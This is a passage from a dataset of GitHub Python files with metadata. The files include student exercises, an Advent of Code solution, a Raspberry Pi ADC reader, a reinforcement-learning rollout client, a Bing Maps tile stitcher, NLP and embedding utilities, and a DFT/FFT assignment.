elementos das listas: '))\n\nb=[]\nc=[]\n\ndef media(lista):\n soma=0\n for i in range(0,len(Lista),1):\n soma=soma+a[i]\n media=soma/n\n return media\n \ndef desvio(lista):\n soma=0\n for i in range(0,len(lista),1):\n soma=soma+(lista[i]-media(lista))**2\n desvio= (soma/(n-1))**(1/2)\n return desvio\n \nfor i in range(0,m,1):\n a=[]\n for i in range(0,n,1):\n valor=float(input('Digite o elemento da lista: '))\n a.append(valor)\n b.append(media(a))\n c.append(desvio(a))\nfor i in range(0,len(b),1):\n \n print('%.2f' %b[i])\n print('%.2f' %c[i])","repo_name":"rafaelperazzo/programacao-web","sub_path":"moodledata/vpl_data/457/usersdata/323/109542/submittedfiles/estatistica.py","file_name":"estatistica.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"14981699336","text":"# A for Rock, B for Paper, and C for Scissors\n# X for Rock, Y for Paper, and Z for Scissors\n\n# 1 for Rock, 2 for Paper, and 3 for Scissors\n# 0 if you lost, 3 if the round was a draw, and 6 if you won\n\ndef get_winner(player, me):\n score = 0\n if me == 'X':\n score += 1\n elif me == 'Y':\n score += 2\n elif me == 'Z':\n score += 3\n\n if ((player == 'A') and (me == 'Y')) or \\\n ((player == 'B') and (me == 'Z')) or \\\n ((player == 'C') and (me == 'X')):\n # me wins\n score += 6\n elif ((player == 'A') and (me == 'X')) or \\\n ((player == 'B') and (me == 'Y')) or \\\n ((player == 'C') and (me == 'Z')):\n # tie\n score += 3\n\n return score\n\n\nif __name__ == '__main__':\n # read in text file\n score = 0\n with open('input.txt', 'r') as f:\n for line in f:\n choices = line.strip().split(' ')\n\n score += get_winner(choices[0], choices [1])\n\n print(score) # 13924\n","repo_name":"Rampagy/AdventOfCode2022","sub_path":"Day02/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17263889907","text":"import time\nimport RPi.GPIO as GPIO\n\npotentiometer_adc = 0\nSPICLK = 0x12 #18\nSPIMOSI = 0x18 #24\nSPIMISO = 0x17 #23\nSPICS = 0x19 #25\n\n# Setup GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(SPIMOSI, GPIO.OUT)\nGPIO.setup(SPIMISO, GPIO.IN)\nGPIO.setup(SPICLK, GPIO.OUT)\nGPIO.setup(SPICS, GPIO.OUT)\n\n\ndef readadc(adcnum, clockpin, mosipin, misopin, cspin):\n\n GPIO.output(cspin, True)\n GPIO.output(clockpin, False)\n GPIO.output(cspin, False)\n \n commandout = (adcnum | 0x18) << 3\n\n for i in range(5):\n if (commandout & 0x80):\n GPIO.output(mosipin, True)\n else:\n GPIO.output(mosipin, False)\n commandout <<= 1\n GPIO.output(clockpin, True)\n GPIO.output(clockpin, False)\n \n adcout = 0\n for i in range(12):\n GPIO.output(clockpin, True)\n GPIO.output(clockpin, False)\n adcout <<= 1\n if (GPIO.input(misopin)):\n adcout |= 0x1\n\n GPIO.output(cspin, True)\n \n return adcout >> 1 # first bit is 'null' so drop it\n\n\n\n\nif __name__ == '__main__':\n\n for i in range(100):\n start = time.clock()\n res = readadc(potentiometer_adc, SPICLK, SPIMOSI, SPIMISO, SPICS)\n stop = time.clock()\n print('PotOutput: {}\\tTimeDelay: {}'.format(res, stop-start))\n time.sleep(0.2)\n GPIO.cleanup()\n\n\n","repo_name":"gadsby/459_Project_Code","sub_path":"Oliver/tighterADC_code.py","file_name":"tighterADC_code.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41239838383","text":"from argparse import Namespace\nfrom typing import Any, List, Dict, Tuple\nfrom types import LambdaType\nfrom collections import defaultdict\n\nimport os\nimport time\nimport traceback\n\nimport ray\n\nfrom ray.util.queue import Queue\nfrom ray.actor import ActorHandle\n\nfrom malib.utils.logging import Logger\n\nfrom malib.utils.typing import AgentID, DataFrame, BehaviorMode\nfrom malib.utils.episode import Episode, NewEpisodeDict, NewEpisodeList\nfrom malib.utils.preprocessor import Preprocessor, get_preprocessor\nfrom malib.utils.timing import Timing\nfrom malib.remote.interface import RemoteInterface\nfrom malib.rollout.envs.vector_env import VectorEnv, SubprocVecEnv\nfrom malib.rollout.inference.ray.server import RayInferenceWorkerSet\nfrom malib.rollout.inference.utils import process_env_rets, process_policy_outputs\n\n\nclass RayInferenceClient(RemoteInterface):\n def __init__(\n self,\n env_desc: Dict[str, Any],\n dataset_server: ray.ObjectRef,\n max_env_num: int,\n use_subproc_env: bool = False,\n batch_mode: str = \"time_step\",\n postprocessor_types: Dict = None,\n training_agent_mapping: LambdaType = None,\n custom_config: Dict[str, Any] = {},\n ):\n \"\"\"Construct an inference client.\n\n Args:\n env_desc (Dict[str, Any]): Environment description\n dataset_server (_type_): A ray object reference.\n max_env_num (int): The maximum of created environment instance.\n use_subproc_env (bool, optional): Indicate subproc envrionment enabled or not. Defaults to False.\n batch_mode (str, optional): Batch mode, could be `time_step` or `episode` mode. Defaults to \"time_step\".\n postprocessor_types (Dict, optional): Post processor type list. Defaults to None.\n training_agent_mapping (LambdaType, optional): Agent mapping function. Defaults to None.\n custom_config (Dict[str, Any], optional): Custom configuration. Defaults to an empty dict.\n \"\"\"\n\n self.dataset_server = dataset_server\n self.use_subproc_env = use_subproc_env\n self.batch_mode = batch_mode\n self.postprocessor_types = postprocessor_types or [\"defaults\"]\n self.process_id = os.getpid()\n self.timer = Timing()\n self.training_agent_mapping = training_agent_mapping or (lambda agent: agent)\n self.max_env_num = max_env_num\n self.custom_configs = custom_config\n\n agent_group = defaultdict(lambda: [])\n runtime_agent_ids = []\n for agent in env_desc[\"possible_agents\"]:\n runtime_id = training_agent_mapping(agent)\n agent_group[runtime_id].append(agent)\n runtime_agent_ids.append(runtime_id)\n self.runtime_agent_ids = set(runtime_agent_ids)\n self.agent_group = dict(agent_group)\n\n obs_spaces = env_desc[\"observation_spaces\"]\n act_spaces = env_desc[\"action_spaces\"]\n env_cls = env_desc[\"creator\"]\n env_config = env_desc[\"config\"]\n\n self.preprocessor: Dict[str, Preprocessor] = {\n agent: get_preprocessor(obs_spaces[agent])(obs_spaces[agent])\n for agent in env_desc[\"possible_agents\"]\n }\n\n if use_subproc_env:\n self.env = SubprocVecEnv(\n obs_spaces, act_spaces, env_cls, env_config, preset_num_envs=max_env_num\n )\n else:\n self.env = VectorEnv(\n obs_spaces, act_spaces, env_cls, env_config, preset_num_envs=max_env_num\n )\n\n def close(self):\n \"\"\"Disconnects with inference servers and turns off environment.\"\"\"\n\n if self.recv_queue is not None:\n _ = [e.shutdown(force=True) for e in self.recv_queue.values()]\n _ = [e.shutdown(force=True) for e in self.send_queue.values()]\n self.env.close()\n\n def run(\n self,\n agent_interfaces: Dict[AgentID, RayInferenceWorkerSet],\n rollout_config: Dict[str, Any],\n dataset_writer_info_dict: Dict[str, Tuple[str, Queue]] = None,\n ) -> Dict[str, Any]:\n \"\"\"Executes environment runner to collect training data or run purely simulation/evaluation.\n\n Note:\n Only simulation/evaluation tasks return evaluation information.\n\n Args:\n agent_interfaces (Dict[AgentID, InferenceWorkerSet]): A dict of agent interface servers.\n rollout_config (Dict[str, Any]): Rollout configuration.\n dataset_writer_info_dict (Dict[str, Tuple[str, Queue]], optional): Dataset writer info dict. Defaults to None.\n\n Returns:\n Dict[str, Any]: A dict of simulation results.\n \"\"\"\n\n # reset timer, ready for monitor\n self.timer.clear()\n task_type = rollout_config[\"flag\"]\n\n server_runtime_config = {\n \"preprocessor\": self.preprocessor,\n \"strategy_specs\": rollout_config[\"strategy_specs\"],\n }\n\n if task_type == \"rollout\":\n assert (\n dataset_writer_info_dict is not None\n ), \"rollout task has no available dataset writer\"\n server_runtime_config[\"behavior_mode\"] = BehaviorMode.EXPLORATION\n elif task_type in [\"evaluation\", \"simulation\"]:\n server_runtime_config[\"behavior_mode\"] = BehaviorMode.EXPLOITATION\n\n eval_results, performance = env_runner(\n self,\n agent_interfaces,\n rollout_config,\n server_runtime_config,\n dwriter_info_dict=dataset_writer_info_dict,\n )\n\n res = performance.copy()\n if task_type != \"rollout\":\n res[\"evaluation\"] = eval_results\n return res\n\n\ndef env_runner(\n client: RayInferenceClient,\n servers: Dict[str, RayInferenceWorkerSet],\n rollout_config: Dict[str, Any],\n server_runtime_config: Dict[str, Any],\n dwriter_info_dict: Dict[str, Tuple[str, Queue]] = None,\n) -> Tuple[List[Dict[str, Any]], Dict[str, float]]:\n \"\"\"The main logic of environment stepping, also for data collections.\n\n Args:\n client (InferenceClient): The inference client.\n rollout_config (Dict[str, Any]): Rollout configuration.\n server_runtime_config (Dict[str, Any]): A dict which gives the runtime configuration of inference server. Keys including\n\n - `preprocessor`: observation preprocessor.\n - `behavior_mode`: a value of `BehaviorMode`.\n - `strategy_spec`: a dict of strategy specs, mapping from runtime agent id to strategy spces.\n\n dwriter_info_dict (Dict[str, Tuple[str, Queue]], optional): A dict maps from runtime ids to a tuple of dataset writer info. Defaults to None.\n\n Raises:\n e: General exceptions.\n\n Returns:\n Tuple[List[Dict[str, Any]], Dict[str, float]]: A tuple of evaluation results and performance results.\n \"\"\"\n\n # check whether remote server or not\n evaluate_on = server_runtime_config[\"behavior_mode\"] == BehaviorMode.EXPLOITATION\n remote_actor = isinstance(list(servers.values())[0], ActorHandle)\n\n try:\n if dwriter_info_dict is not None:\n episodes = NewEpisodeList(\n num=client.env.num_envs, agents=client.env.possible_agents\n )\n else:\n episodes = None\n\n with client.timer.timeit(\"environment_reset\"):\n env_rets = client.env.reset(\n fragment_length=rollout_config[\"fragment_length\"],\n max_step=rollout_config[\"max_step\"],\n )\n\n env_dones, processed_env_ret, dataframes = process_env_rets(\n env_rets=env_rets,\n preprocessor=server_runtime_config[\"preprocessor\"],\n preset_meta_data={\"evaluate\": evaluate_on},\n )\n # env ret is key first, not agent first: state, obs\n if episodes is not None:\n episodes.record(\n processed_env_ret, agent_first=False, is_episode_done=env_dones\n )\n\n start = time.time()\n cnt = 0\n\n while not client.env.is_terminated():\n # group dataframes by runtime ids.\n grouped_data_frames: Dict[str, List[DataFrame]] = defaultdict(lambda: [])\n for agent, dataframe in dataframes.items():\n runtime_id = client.training_agent_mapping(agent)\n grouped_data_frames[runtime_id].append(dataframe)\n\n with client.timer.time_avg(\"policy_step\"):\n if remote_actor:\n policy_outputs: Dict[str, List[DataFrame]] = {\n rid: ray.get(\n server.compute_action.remote(\n grouped_data_frames[rid],\n runtime_config=server_runtime_config,\n )\n )\n for rid, server in servers.items()\n }\n else:\n policy_outputs: Dict[str, List[DataFrame]] = {\n rid: server.compute_action(\n grouped_data_frames[rid],\n runtime_config=server_runtime_config,\n )\n for rid, server in servers.items()\n }\n\n with client.timer.time_avg(\"process_policy_output\"):\n # TODO(ming): do not use async stepping\n env_actions, processed_policy_outputs = process_policy_outputs(\n policy_outputs, client.env\n )\n\n if episodes is not None:\n episodes.record(\n processed_policy_outputs,\n agent_first=True,\n is_episode_done=env_dones,\n )\n\n with client.timer.time_avg(\"environment_step\"):\n env_rets = client.env.step(env_actions)\n env_dones, processed_env_ret, dataframes = process_env_rets(\n env_rets=env_rets,\n preprocessor=server_runtime_config[\"preprocessor\"],\n preset_meta_data={\"evaluate\": evaluate_on},\n )\n # state, obs, rew, done\n if episodes is not None:\n episodes.record(\n processed_env_ret, agent_first=False, is_episode_done=env_dones\n )\n\n cnt += 1\n\n if dwriter_info_dict is not None:\n # episode_id: agent_id: dict_data\n episodes = episodes.to_numpy()\n for rid, writer_info in dwriter_info_dict.items():\n # get agents from agent group\n agents = client.agent_group[rid]\n batches = []\n # FIXME(ming): multi-agent is wrong!\n for episode in episodes:\n agent_buffer = [episode[aid] for aid in agents]\n batches.append(agent_buffer)\n writer_info[-1].put_nowait_batch(batches)\n end = time.time()\n rollout_info = client.env.collect_info()\n except Exception as e:\n traceback.print_exc()\n raise e\n\n performance = client.timer.todict()\n performance[\"FPS\"] = client.env.batched_step_cnt / (end - start)\n eval_results = rollout_info\n performance[\"total_timesteps\"] = client.env.batched_step_cnt\n\n return eval_results, performance\n","repo_name":"sjtu-marl/malib","sub_path":"malib/rollout/inference/ray/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":11352,"program_lang":"python","lang":"en","doc_type":"code","stars":439,"dataset":"github-code","pt":"94"} +{"seq_id":"74883799669","text":"import requests\nimport math\nimport random\nfrom PIL import Image\n# https://docs.microsoft.com/en-us/bingmaps/articles/bing-maps-tile-system\nEarthRadius = 6378137;\nMinLatitude, MaxLatitude = -85.05112878, 85.05112878\nMinLongitude, MaxLongitude = -180, 180\ndef clip(n, minv, maxv):\n return min(max(n, minv), maxv)\ndef map_size(level):\n return 256 << level\ndef ground_resolution(lat, level):\n lat = clip(lat, MinLatitude, MaxLatitude);\n return math.cos(lat * math.pi / 180) * 2 * math.pi * EarthRadius / map_size(level)\ndef latlon2PixXY(lat, lon, level):\n lat, lon = clip(lat, MinLatitude, MaxLatitude), clip(lon, MinLongitude, MaxLongitude)\n x = (lon + 180) / 360\n sinlat = math.sin(lat * math.pi / 180)\n y = 0.5 - math.log((1 + sinlat) / (1 - sinlat)) / (4 * math.pi);\n mapSize = map_size(level)\n return [int(clip(i * mapSize + .5, 0, mapSize - 1)) for i in [x, y]]\ndef pixXY2LatLon(pX, pY, level):\n mapSize = map_size(level)\n x = clip(pX, 0, mapSize - 1) / mapSize - .5\n y = .5 - clip(pY, 0, mapSize - 1) / mapSize\n return 90 - 360 * math.atan(math.exp(-y * 2 * math.py)) / math.pi, 360 * x\ndef pixXY2tileXY(pX, pY):\n return int(pX / 256), int(pY / 256)\ndef tileXY2pixXY(tX, tY):\n return tX * 256, tY * 256\ndef tileXY2QKey(tX, tY, level):\n ret, i = \"\", level\n while i > 0:\n mask = 1 << i - 1\n v = (1 if tX & mask != 0 else 0) + (2 if tY & mask != 0 else 0)\n ret, i = ret + str(v), i - 1\n return ret\ndef dfm2float(d, f, s):\n return d + f / 60.0 + s / 3600.0\ndef QKey2Url( qkey ):\n return 'http://a'+random.choice(['0','1','2','3'])+'.ortho.tiles.virtualearth.net/tiles/a' + qkey + '.png?g=50'\ndef getTile( qkey ):\n url , fn= QKey2Url(qkey) ,qkey+'.jpg'\n if os.path.exists( fn ):\n \treturn Image.open(fn)\n r = requests.get(url)\n with open(fn, 'ab') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n f.flush()\n return Image.open(fn)\ndef getQKeys(latD, latM, latS, lonD, lonM, lonS, level,w):\n h = w\n lat, lon = dfm2float(latD, latM, latS), dfm2float(lonD, lonM, lonS)\n px, py = latlon2PixXY(lat, lon, level)\n tx, ty = pixXY2tileXY(px,py)\n qkeys = []\n for i in range(h+1+h):\n qkeys.append([\"\" ]*(w+1+w) )\n for i in range(1+2*w):\n for j in range(1+2*h):\n qkeys [i][j]= tileXY2QKey( tx+i-w,ty + j -h ,level)\n return qkeys\n\ndef merge_up( qkeys ):\n rows,cols ,(w,h)= len(qkeys),len(qkeys[0]) , getTile(qkeys[0][0]).size\n val = Image.new( 'RGB', ( w*cols, h*rows ), 255)\n for i in range(rows):\n for j in range(cols):\n print(i,j,qkeys[i][j]) \n val.paste(getTile( qkeys[i][j] ), ( i*w,j*h ) )\n return val\n\ndef GetMyImg( latD, latM, latS, lonD, lonM, lonS, level, width):\n keys = getQKeys(latD, latM, latS, lonD, lonM, lonS, level, width )\n merge_up(keys).save( keys[width][width]+'-'+ str(level) +\"-\" + str(width)+'.jpg' )\n\nfor level in [18]:\n\tfor width in [30]:\n\t\tGetMyImg(35,54,10,126,36,59,level,width)\n","repo_name":"gq4fabric/ve_tile_merge","sub_path":"msveTiles.py","file_name":"msveTiles.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29309341376","text":"import plotly.graph_objs as go\n\nimport pandas as pd\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\n\nfrom sklearn.externals import joblib\n\nfrom sqlalchemy import create_engine\n\nimport nltk\n\nnltk.download('stopwords')\nnltk.download('wordnet') # download for lemmatization\n\n\ndef tokenize(text):\n \"\"\" Transform text into list of tokens with stopwords removed.\n \n Args :\n text (str) : Text\n \n Output :\n clean tokens (list) : Tokens with stopwords removed\n \n \"\"\"\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n\ndef get_data():\n \"\"\" Load data.\n \n Args :\n None\n \n Outputs :\n df : pandas dataframe containing the messages and their categories.\n \n \"\"\"\n\n engine = create_engine('sqlite:///../data/DisasterResponse.db')\n df = pd.read_sql_table('DisasterResponse.db', engine)\n return df\n\n\ndef get_model():\n \"\"\" Load model.\n \n Args :\n None\n \n Outputs :\n model : model trained to classify messages previously trained.\n \n \"\"\"\n model = joblib.load(\"../models/classifier.pkl\")\n return model\n\n\ndef get_graphs():\n \"\"\" Creates two plotly visualizations.\n\n Args :\n None\n\n Output:\n graphs (list(dict)): list containing the four plotly visualizations\n\n \"\"\"\n # Get the data\n df = get_data()\n\n # create visuals\n graphs = []\n\n # graph 1\n graph_one = []\n\n genre_counts = df.groupby('genre').count()['message']\n genre_names = list(genre_counts.index)\n\n graph_one.append(\n go.Bar(\n x=genre_names,\n y=genre_counts,\n )\n )\n\n layout_one = dict(title='Distribution of Message Genres',\n xaxis=dict(title=\"Genre\"),\n yaxis=dict(title=\"Count\"),\n )\n\n # graph 2\n graph_two = []\n\n categories_names = df.columns[5:-1]\n categories_counts = df[categories_names].sum()\n\n graph_two.append(\n go.Bar(\n x=categories_names,\n y=categories_counts,\n marker=dict(color='red')\n )\n )\n\n layout_two = dict(title='Distribution of Message Categories',\n xaxis=dict(tickangle=-45),\n yaxis=dict(title=\"Count\"),\n )\n\n graphs.append(dict(data=graph_one, layout=layout_one))\n graphs.append(dict(data=graph_two, layout=layout_two))\n\n return graphs\n","repo_name":"olgob/Disaster-response-pipelines","sub_path":"app/wrangling.py","file_name":"wrangling.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"25821167265","text":"import tensorflow as tf\nfrom utils.WordSegmenter import WordSegmenter\nimport pickle\nimport argparse\nimport numpy as np\nimport time\nimport os\n\nfrom models import assemble_graph\n\n\nparser = argparse.ArgumentParser(description='Train word vectors')\nparser.add_argument('-d', type=int, default=300, dest='dimensionality', help='Trained embedding dimensionality')\nparser.add_argument('-v', type=int, default=100001, dest='vocabulary_size', help='Size of vocabulary to train')\nparser.add_argument('-m', type=str, default='skipgram', dest='model_name', help='Trained model')\nparser.add_argument('-l', type=str, default='en', dest='language', help='Language of wikipedia dump')\nparser.add_argument('-sgm', type=str, dest='segmenter', help='Segmenter Path')\nparser.add_argument('-sgmlen', type=int, dest='segmenter_len', help='Maximum length of segmented sequence')\nparser.add_argument('graph_saving_path', type=str, help='Ckpt path')\n\n\nargs = parser.parse_args()\n\n\nn_dims = args.dimensionality\nmodel_name = args.model_name\nlang = args.language\nsgm_path = args.segmenter\nsgm_len = args.segmenter_len\nfull_voc_size = 200001#args.full_vocabulary_size\ngraph_saving_path = args.graph_saving_path\nvocab_size = args.vocabulary_size\n\nckpt_path = os.path.join(graph_saving_path, \"model.ckpt\")\n\n\ndef assign_embeddings(sess, terminals, vocab_size):\n in_words_ = terminals['in_words']\n final_ = terminals['final']\n dropout_ = terminals['dropout']\n attention_ = terminals['attention_mask']\n\n print(\"\\t\\tDumpung vocabulary of size %d\" % vocab_size)\n ids = np.array(list(range(vocab_size)), dtype=np.int32)\n\n if model_name == 'morph' or model_name == 'fasttext':\n ids_expanded = segmenter.segment(ids)\n\n emb_sum_path = \"./embeddings/%s_%d_sum.pkl\" % (model_name, vocab_size)\n final_sum = sess.run(final_, {in_words_: ids_expanded, dropout_: 1.0})\n pickle.dump(final_sum, open(emb_sum_path, \"wb\"))\n\n emb_voc_path = \"./embeddings/%s_%d_voc.pkl\" % (model_name, vocab_size)\n id_voc = np.zeros_like(ids_expanded)\n id_voc[:,0] = ids\n final_voc = sess.run(final_, {in_words_: id_voc, dropout_: 1.0})\n pickle.dump(final_voc, open(emb_voc_path, \"wb\"))\n\n if model_name == 'skipgram':\n emb_dump_path = \"./embeddings/%s_%d.pkl\" % (model_name, vocab_size)\n final = sess.run(final_, {in_words_: ids_expanded,\n dropout_: 1.0})\n pickle.dump(final, open(emb_dump_path, \"wb\"))\n\n if model_name == 'attentive':\n sgm_p = sgm_path.split(\"/\")[0]\n emb_dump_path = \"./embeddings/%s_%s_%d.pkl\" % (model_name, sgm_p, vocab_size)\n dump_path = \"./embeddings/attention_mask_%s_%s_%d.pkl\" % (sgm_p, model_name, vocab_size)\n\n attention_mask = sess.run(attention_, {in_words_: ids_expanded,\n dropout_: 1.0})\n pickle.dump(attention_mask, open(dump_path, \"wb\"))\n pickle.dump(final, open(emb_dump_path, \"wb\"))\n\n\n\nprint(\"Starting saving\", time.asctime( time.localtime(time.time()) ))\n\nif model_name != 'skipgram':\n segmenter = WordSegmenter(sgm_path, lang, sgm_len)\n sgm = segmenter.segment\n\n segm_voc_size = segmenter.unique_segments\n word_segments = segmenter.max_len\n\n print(\"Max Word Len is %d segments\" % word_segments)\n\n terminals = assemble_graph(model=model_name,\n vocab_size=full_voc_size,\n segment_vocab_size=segm_voc_size,\n max_word_segments=word_segments,\n emb_size=n_dims)\nelse:\n\n terminals = assemble_graph(model=model_name,\n vocab_size=full_voc_size,\n emb_size=n_dims)\n\n\nin_words_ = terminals['in_words']\nout_words_ = terminals['out_words']\nlabels_ = terminals['labels']\ntrain_ = terminals['train']\nloss_ = terminals['loss']\nadder_ = terminals['adder']\nlr_ = terminals['learning_rate']\nbatch_count_ = terminals['batch_count']\n\n\nsaver = tf.train.Saver()\nsaveloss_ = tf.summary.scalar('loss', loss_)\n\n\ndef save_snapshot(sess, terminals, vocab_size):\n batch_count = sess.run(terminals['batch_count'])\n path = \"./models/%s_%d_%d\" % (model_name, vocab_size, batch_count)\n ckpt_p = \"%s/model.ckpt\" % path\n assign_embeddings(sess, terminals, vocab_size)\n # save_path = saver.save(sess, ckpt_p)\n\n\nepoch = 0\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # Restore from checkpoint\n saver.restore(sess, ckpt_path)\n sess.graph.as_default()\n\n save_snapshot(sess, terminals, vocab_size)\n\nprint(\"Finished saving\", time.asctime( time.localtime(time.time()) ))","repo_name":"VitalyRomanov/segmented-embeddings","sub_path":"stream_saver.py","file_name":"stream_saver.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8609213078","text":"import numpy as np\n\n####################################################################################################\n# Exercise 1: DFT\n\ndef dft_matrix(n: int) -> np.ndarray:\n \"\"\"\n Construct DFT matrix of size n.\n\n Arguments:\n n: size of DFT matrix\n\n Return:\n F: DFT matrix of size n\n\n \"\"\"\n F = np.zeros((n, n), dtype='complex128')\n \n w = np.zeros(n, dtype='complex128')\n w = np.exp(((-2*np.pi) * 1j)/ n)\n \n for i in range (n):\n for i_2 in range (n):\n F[i][i_2] = np.power(w,(i_2 * i))\n F = np.dot((1/np.sqrt(n)), F)\n \n\n return F\n\n\ndef is_unitary(matrix: np.ndarray) -> bool:\n \"\"\"\n Check if the passed in matrix of size (n times n) is unitary.\n\n Arguments:\n matrix: the matrix which is checked\n\n Return:\n unitary: True if the matrix is unitary\n \"\"\"\n \n mcon= matrix.conjugate().T\n return np.allclose(np.dot(mcon, matrix), np.identity(len(matrix)))\n\n\ndef create_harmonics(n: int = 128) -> (list, list):\n \"\"\"\n Create delta impulse signals and perform the fourier transform on each signal.\n\n Arguments:\n n: the length of each signal\n\n Return:\n sigs: list of np.ndarrays that store the delta impulse signals\n fsigs: list of np.ndarrays with the fourier transforms of the signals\n \"\"\"\n sigs = []\n sigs_m = np.identity(n)\n for i in range (n):\n sigs.append(sigs_m[i])\n \n fsigs = []\n for i in range (n):\n fsigs.append(np.dot(dft_matrix(n), sigs[i]))\n\n\n return sigs, fsigs\n\n\n####################################################################################################\n# Exercise 2: FFT\n\n\ndef shuffle_bit_reversed_order(data: np.ndarray) -> np.ndarray:\n \"\"\"\n Shuffle elements of data using bit reversal of list index.\n\n Arguments:\n data: data to be transformed (shape=(n,), dtype='float64')\n\n Return:\n data: shuffled data array\n \"\"\"\n datacopy = data.copy()\n data_b = []\n data_b_r = []\n data_i = np.zeros(len(data), dtype = int)\n width = len(\"{0:b}\".format(len(data)-1))\n loadi = 0\n for i in range (len(data)):\n data_b.append('{:0{width}b}'.format(i, width=width))\n for b in data_b:\n data_b_r.append(b[::-1])\n for b in data_b_r:\n data_i[loadi] = int(b, 2)\n loadi += 1\n for i in range (len(data_i)):\n data[i] = datacopy[data_i[i]] \n return data\n\n\ndef fft(data: np.ndarray) -> np.ndarray:\n \"\"\"\n Perform real-valued discrete Fourier transform of data using fast Fourier transform.\n\n Arguments:\n data: data to be transformed (shape=(n,), dtype='float64')\n\n Return:\n fdata: Fourier transformed data\n\n Note:\n This is not an optimized implementation but one to demonstrate the essential ideas\n of the fast Fourier transform.\n\n \"\"\"\n\n fdata = np.asarray(data, dtype='complex128')\n n = fdata.size\n fdata = shuffle_bit_reversed_order(fdata)\n if not n > 0 or (n & (n - 1)) != 0:\n raise ValueError\n\n \n\n treedepth = int(np.log2(n))\n for m in range (treedepth):\n for k in range (2**m):\n for i in range (0, n, (2**(m+1))):\n i = i+k\n j = i + 2**m \n omega = np.exp((-2 * np.pi * 1j* k)/(2**(m+1))) * fdata[j]\n fdata[j] = fdata[i] - omega\n fdata[i] = fdata[i] + omega\n \n \n fdata = (1/np.sqrt(n))* fdata \n return fdata\n\n\ndef generate_tone(f: float = 261.626, num_samples: int = 44100) -> np.ndarray:\n \"\"\"\n Generate tone of length 1s with frequency f (default mid C: f = 261.626 Hz) and return the signal.\n\n Arguments:\n f: frequency of the tone\n\n Return:\n data: the generated signal\n \"\"\"\n\n # sampling range\n x_min = 0.0\n x_max = 1.0\n data = np.zeros(num_samples)\n\n for i in range (num_samples):\n data[i] = np.sin(2*np.pi*f*(i/(num_samples-1)))\n\n return data\n\n\ndef low_pass_filter(adata: np.ndarray, bandlimit: int = 1000, sampling_rate: int = 44100) -> np.ndarray:\n \"\"\"\n Filter high frequencies above bandlimit.\n\n Arguments:\n adata: data to be filtered\n bandlimit: bandlimit in Hz above which to cut off frequencies\n sampling_rate: sampling rate in samples/second\n\n Return:\n adata_filtered: filtered data\n \"\"\"\n \n # translate bandlimit from Hz to dataindex according to sampling rate and data size\n bandlimit_index = int(bandlimit*adata.size/sampling_rate)\n\n fdata = np.fft.fft(adata)\n for i in range(bandlimit_index + 1, adata.size - bandlimit_index):\n fdata[i] = 0\n \n\n adata_filtered = np.fft.ifft(fdata)\n adata_filtered = np.real(adata_filtered)\n return adata_filtered\n\n\nif __name__ == '__main__':\n print(\"All requested functions for the assignment have to be implemented in this file and uploaded to the \"\n \"server for the grading.\\nTo test your implemented functions you can \"\n \"implement/run tests in the file tests.py (> python3 -v test.py [Tests.]).\")\n","repo_name":"filiprejmus/-scientific-computing","sub_path":"main_Project3.py","file_name":"main_Project3.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"11672792154","text":"from django.urls import path\nfrom django.contrib import admin\n#from .views import *\nfrom .views import home,loginUser,logoutUser,registerUser,applyPage,recruiterReg,seekerReg\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',home,name='home'),\n path('login/',loginUser,name='login'),\n path('logout/',logoutUser,name='logout'),\n path('register/recruiter',recruiterReg),\n path('register/seeker/',seekerReg),\n path('register/',registerUser,name='register'),\n path('apply/',applyPage,name='apply'),\n]\n\n\n\n\n#from django.urls import path,include\n#from django.conf import settings\n#from django.conf.urls.static import static\n\n#urlpatterns = [\n# path('admin/', admin.site.urls),\n# path('',include('JobPortal.urls'))\n#]+ static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\n","repo_name":"FaisalSR21/recruitme","sub_path":"DataFlairJobPortal/JobPortal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71801336630","text":"import sys\nfrom collections import Counter\n\nN = int(sys.stdin.readline())\n\nnlist = []\nfor _ in range(N):\n nlist.append(int(sys.stdin.readline()))\nnlist.sort()\n\n# 최빈값구하기\ncnt = Counter(nlist).most_common()\nif len(cnt) > 1 and cnt[0][1] == cnt[1][1]:\n freq = cnt[1][0]\nelse:\n freq = cnt[0][0]\n\nprint(round(sum(nlist)/len(nlist)))\nprint(nlist[len(nlist)//2])\nprint(freq)\nprint(nlist[-1]-nlist[0])","repo_name":"hyein99/Algorithm_baekjoon","sub_path":"단계별/12_정렬/2108_통계학.py","file_name":"2108_통계학.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"2656767628","text":"import cv2\r\nimport numpy as np\r\nfrom json.decoder import JSONDecodeError\r\nimport json\r\n\r\ndef specific(coordinate, classes):\r\n \r\n result = []\r\n \r\n if 